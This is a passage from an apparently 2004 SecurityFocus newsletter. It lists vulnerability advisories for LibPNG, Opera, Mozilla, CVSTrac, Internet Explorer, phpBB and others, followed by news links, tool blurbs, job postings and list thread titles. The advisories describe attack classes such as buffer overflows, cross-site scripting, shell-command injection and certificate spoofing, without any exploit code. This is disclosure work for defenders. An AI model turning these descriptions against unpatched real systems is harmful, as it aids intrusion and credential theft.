36. LibPNG Graphics Library Unspecified Remote Buffer Overflow V...
BugTraq ID: 10872
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10872
Summary:
Reportedly LibPNG contains a buffer offset calculation error that may facilitate a buffer overflow vulnerability. This issue is due to a logical design error.
This vulnerability may allow an attacker to crash applications utilizing the library, or potentially allow code execution.
Please note that vulnerabilities previously outlined in this BID have been described in the LibPNG Graphics Library Multiple Remote Vulnerabilities outlined in BID 10857.
37. Opera Remote Location Object Cross-Domain Scripting Vulnerab...
BugTraq ID: 10873
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10873
Summary:
Opera is affected by a remote location object cross-domain scripting vulnerability. This issue is due to a failure to properly validate methods that a user can access.
An attacker might leverage this issue to steal cookie based authentication credentials, conduct phishing attacks along with other attacks. Furthermore, provided there is an HTML script invoking 'location' methods local to a victim's computer (such as c:/winnt/help/ciadmin.htm in most Microsoft Windows implementations) an attacker can exploit this issue to gain read access to directory contents, files and email read using Opera's email utilities.
Although this issue is reported to affect versions 1.52 and 1.53 of the affected software, it is likely that earlier versions are also affected.
38. Mozilla Browser Input Type HTML Tag Unauthorized Access Vuln...
BugTraq ID: 10874
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10874
Summary:
Mozilla browser is reportedly affected by an input type HTML tag unauthorized access vulnerability. This issue is due to an access validation error that allows access to arbitrary files on an unsuspecting user's system.
This issue will allow an attacker to obtain arbitrary files residing on the computer of an unsuspecting user that activates a malicious script.
39. Mozilla Browser/Thunderbird SendUIDL POP3 Message Handling R...
BugTraq ID: 10875
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10875
Summary:
Mozilla and Mozilla Thunderbird are reported prone to a remote heap overflow vulnerability. The issue is reported to exist due to a lack of sufficient boundary checks performed on POP3 data handled by SendUidl().
An attacker controlled POP3 mail server may exploit this condition by sending a specifically crafted email message to the affected mail client. This will result in the corruption of heap-based memory.
40. Mozilla Browser Non-FQDN SSL Certificate Spoofing Vulnerabil...
BugTraq ID: 10876
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10876
Summary:
Mozilla browser is reportedly vulnerable to an SSL certificate spoofing vulnerability in the 'cert_TestHostName()' function. This issue is due to a design error that fails to properly validate certified host names.
This issue would allow an attacker to spoof a trusted certificate from a third party site, facilitating phishing style attacks by luring an unsuspecting user to enter information on what is apparently a trusted site.
41. CVSTrac filediff Remote Command Execution Vulnerability
BugTraq ID: 10878
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10878
Summary:
CVSTrac is affected by a remote command execution vulnerability in the 'filediff' functionality. This issue is due to an input validation error that allows for the appending of shell commands.
An attacker could leverage this issue to execute arbitrary shell commands on a vulnerable computer with the privileges of the web server process.
42. Microsoft Internet Explorer mms Protocol Handler Executable ...
BugTraq ID: 10879
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10879
Summary:
A vulnerability has been reported to exist in Microsoft Internet Explorer that may allow remote attackers to pass arbitrary command line arguments to an application associated with the mms: URI protocol handler. Windows Media Player is the application normally associated with this URI protocol handler.
This vulnerability would permit an attacker to influence the invocation arguments for the executable and could result in loss of compromise of various security properties. This may be exploited from a malicious Web page or possibly through HTML email.
It is not known if this issue is specific to the mms: URI protocol handler or if other URI protocol handlers on the system may be similarly affected. This vulnerability could be a general issue in Internet Explorer with many possible attack vectors, although there is not enough information available at this time to make this determination.
43. Mozilla SSL Redirect Spoofing Vulnerability
BugTraq ID: 10880
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10880
Summary:
It is reported that Mozilla, and products derived from Mozilla are susceptible to an SSL redirect spoofing vulnerability.
By exploiting this vulnerability, an attacker can ensure that the victims browser contains the SSL lock icon, and will display the SSL certificate information of a legitimate site when the lock is clicked on.
This vulnerability may aid in Phishing style attacks.
Mozilla prior to 1.7, Mozilla Firebird 0.7, Mozilla Firefox prior to 0.9, and Mozilla Thunderbird prior to 0.7 are all reported vulnerable.
44. Thomson SpeedTouch Home ADSL Modem Predictable Initial TCP S...
BugTraq ID: 10881
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10881
Summary:
A vulnerability is reported to exist in the algorithms used by Thomson SpeedTouch Home ADSL Modem to generate initial TCP sequence numbers. The ability to predict TCP sequence numbers may allow a remote attacker to inject packets into a vulnerable data stream, for example the telnet service on the affected modem.
45. GNU Info Follow XRef Buffer Overrun Vulnerability
BugTraq ID: 10882
Remote: No
Date Published: Aug 06 2004
Relevant URL: http://www.securityfocus.com/bid/10882
Summary:
GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the (f) follow xref Info command.
An attacker may exploit this vulnerability by crafting a malicious Info script that is sufficient to trigger the issue.
Although this vulnerability is reported to affect info version 4.7-2.1, other versions might also be affected.
46. phpBB Login.PHP Cross-Site Scripting Vulnerability
BugTraq ID: 10883
Remote: Yes
Date Published: Aug 06 2004
Relevant URL: http://www.securityfocus.com/bid/10883
Summary:
phpBB is affected by a cross-site scripting vulnerability in the 'login.php' script. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
This can be exploited by constructing links that pass malicious strings through the affected URI parameter. If an unsuspecting user visits such a link, the malicious, externally created content supplied in the link will be rendered (or executed, in the case of script code) as part of the 'login.php' document and within the context of the vulnerable website (including the phpBB forum).
Attackers may exploit this vulnerability to obtain the authentication credentials of other forum users. If the domain hosts other applications, their credentials and/or other sensitive information (session IDs, etc) may be exposed.
III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Wardriving guilty plea in Lowe's wi-fi case
By: Kevin Poulsen
Federal prosecutors say a network engineer convicted for checking his e-mail over a hardware store's wi-fi network is likely the first U.S. wardriving conviction.
http://www.securityfocus.com/news/9281
2. Ashcroft wins Internet wiretap system
By: Kevin Poulsen
U.S. regulators vote to wire broadband networks for law enforcement surveillance.
http://www.securityfocus.com/news/9263
3. ATM keypads get a security boost
By: Kevin Poulsen
Credit card companies are responding to a host of high and low-tech attacks on the sanctity of your ATM code.
http://www.securityfocus.com/news/9161
4. Phishermen attack on a viral scale
By: John Leyden, The Register
The prevalence of some phishing attacks are beginning to rival even high-level viral outbreaks, according to email filtering firm MessageLabs.
http://www.securityfocus.com/news/9297
5. Price isn't right for new Bagle variant
By: John Leyden, The Register
Yet another variant of the mass-mailing Bagle worm began spreading widely yesterday.
http://www.securityfocus.com/news/9296
6. Phone spam misery looms Stateside
By: Andrew Orlowski, The Register
A little-noticed Bill before the Senate will ensure daily misery for US cellphone users, thanks to the inattentiveness of telecomms regulator the FCC.
http://www.securityfocus.com/news/9283
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. MonitorMagic - Server & Network Monitor 6.0
By: Tools4ever
Relevant URL: http://www.tools4ever.com/products/monitormagic/
Platforms: Windows 2000, Windows NT, Windows XP
Summary:
MonitorMagic is a proactive server and network monitoring and reporting tool for Windows 2003/XP/2000/NT servers, workstations and SNMP devices and supports agentless monitoring. MonitorMagic supports Windows and UNIX based resources such as memory, disk and CPU load and optionally records the values into a database to enable graphical trending and reporting. MonitorMagic ships with predefined policies for popular hardware and applications.
2. CipherPack Pro 3.2
By: VIO Systems Limited
Relevant URL: http://www.cipherpack.com
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Encrypts and compresses files and data into a single Windows executable. The user just runs it and when the correct key is supplied, the file decrypts. Without the correct key, the original file contents can never be seen.
3. Savungan - Stateful Inspection Firewall for Windows with FUL... 2.0
By: Egemen Tas
Relevant URL: http://www.ModemWall.com/savungan.htm
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Savungan is a stateful inspection firewall designed for Microsoft Windows platforms available with FULL SOURCE CODE. It is an advanced filtering agent for TCP/IP based networks, having very flexible rule language to make packet inspection more powerful and effective. Security administrators have had some difficulties to build and maintain a suitable filtering infrastructure after deploying a firewall.
4. SSlDigger 1.0
By: Rudolph Araujo
Relevant URL: http://www.foundstone.com/s3i
Platforms: Windows XP
Summary:
SSL Digger looks at the SSL Ciphers that a web server supports. It produces a report and grades the site.
5. DiskLogon 1.0.17.112
By: DiskLogon Development Team
Relevant URL: http://www.disklogon.com/DiskLogon.exe
Platforms: Windows 2000, Windows XP
Summary:
DiskLogon, like a Smart Card logon, is a software that enables you to log on to your computer with a removable disk.
DiskLogon saves you the trouble of entering your user name and password every time you log on. All you have to do is to plug in your removable disk, and you can log on to your computer quickly and safely. When you plug out your removable disk, your computer will automatically lock up you're your safety.
6. UndeleteSMS 1.0
By: Arne Vidstrom
Relevant URL: http://vidstrom.net/downloads/undeletesms.exe
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
UndeleteSMS can recover deleted SMS messages from a GSM SIM card.
V. SECURITYJOBS LIST SUMMARY
----------------------------
1. [SJ-JOB] Sr. Security Analyst, Busto Arsizio (VA), I... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370938
2. [SJ-JOB] Jr. Security Analyst, Busto Arsizio (VA), I... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370937
3. [SJ-JOB] CHECK Team Leader, London, GB (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370936
4. [SJ-JOB] Account Manager, San Francisco, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370933
5. [SJ-JOB] Sr. Security Analyst, Clearwater, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370931
6. [SJ-JOB] Chief Security Strategist, Dallas, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370929
7. [SJ-JOB] Security Consultant, Riyadh, SA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370926
8. [SJ-JOB] Quality Assurance, Santa Barbara, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370917
9. [SJ-JOB] Security Product Manager, San Jose, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370915
10. [SJ-JOB] Sr. Security Engineer, Boston, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370777
11. [SJ-JOB] Evangelist, San Jose, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370775
12. [SJ-JOB] Security Consultant, Indianopolis, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370770
13. [SJ-JOB] Account Manager, New York, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370769
14. [SJ-JOB] Security Consultant, Albany, NY, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370766
15. [SJ-JOB] Security Consultant, San Francisco , US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370759
16. [SJ-JOB] Security Engineer, Eatontown, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370753
17. [SJ-JOB] Security Consultant, Houston, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370750
18. [SJ-JOB] Security Engineer, Washington, DC, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370745
19. [SJ-JOB] Security Auditor, Miami, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370744
20. [SJ-JOB] Security Engineer, New York (and NJ Metro A... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370739
21. [SJ-JOB] Management, Irvine, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370737
22. [SJ-JOB] Security Consultant, Albany, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370734
23. [SJ-JOB] Sales Engineer, Atlanta, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370733
24. [SJ-JOB] Security Consultant, New York, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370731
25. [SJ-JOB] Account Manager, Chicago, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370729
26. [SJ-JOB] Sr. Security Engineer, Palo Alto, US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/370728
VI. INCIDENTS LIST SUMMARY
--------------------------
1. New Mass Mailer Virus (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371322
2. NDR +Hotmail & MSN (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371262
3. distributed spamming/scamming scheme? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371139
4. Anyone else seeing SSH scans? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371086
5. Is this some type of scan (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371085
VII. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
NO NEW POSTS FOR THE WEEK 2004-08-03 to 2004-08-10.
VIII. MICROSOFT FOCUS LIST SUMMARY
----------------------------------
1. most avtive attack type (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/371283
2. SecurityFocus Microsoft Newsletter #200 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/370780
IX. SUN FOCUS LIST SUMMARY
--------------------------
1. Password recovery (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371287
2. How to Restrict a user, not a root, Login to the Con... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371161
3. trouble setting up routing (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371160
4. ipv6 questions + solaris 9 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371158
5. syslog logging (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/370904
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. can Hopster traffic be blocked? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/371150
XI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to sf-news-unsubscribe (at) securityfocus (dot) com [email concealed] from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.
If your email address has changed email listadmin (at) securityfocus (dot) com [email concealed] and ask to be manually removed.
XII. SPONSOR INFORMATION
-----------------------
This issue sponsored by: SPI Dynamics
ALERT: How Hackers Use LDAP Injection to Steal Your Data and Bypass
Authentication
It's as simple as placing additional LDAP query commands into a Web form
input box giving hackers complete access to all your backend systems!
Firewalls and IDS will not stop such attacks because LDAP Injections are
seen as valid data.
Download this *FREE* white paper from SPI Dynamics for a complete guide to
protection!
http://www.securityfocus.com/sponsor/SPIDynamics_sf-news_040810
------------------------------------------------------------------------
[ reply ]